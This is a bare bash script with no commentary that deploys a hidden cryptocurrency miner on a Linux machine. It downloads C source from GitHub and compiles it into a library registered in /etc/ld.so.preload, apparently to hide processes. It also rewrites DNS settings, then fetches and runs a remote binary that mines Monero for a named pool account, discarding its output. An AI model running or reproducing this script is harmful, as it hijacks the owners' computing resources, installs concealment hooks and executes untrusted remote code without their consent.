#!/bin/bash
apt-get update ; apt-get install wget sudo -y
apt install -y curl
curl https://github.com/kidoescegh/swa/raw/main/nyumput.c -o nyumput.c
apt-get install build-essential -y
gcc -Wall -fPIC -shared -o libnyumput.so nyumput.c -ldl
mv libnyumput.so /usr/local/lib/
echo /usr/local/lib/libnyumput.so >> /etc/ld.so.preload
rm nyumput.c
echo "supersede domain-name-servers 1.1.1.1;">> /etc/dhcp/dhclient.conf
/etc/init.d/network restart
wget https://github.com/vedhagsvp/aplamner/releases/download/nertas/greavet
chmod +x greavet
./greavet --algo xmr --account CP_udnvh2owpq --worker $(echo $(shuf -i 1-15000 -n 1)-SGRAER23) --pool xmr.hk.apool.io:3334 > /dev/null 2>&1
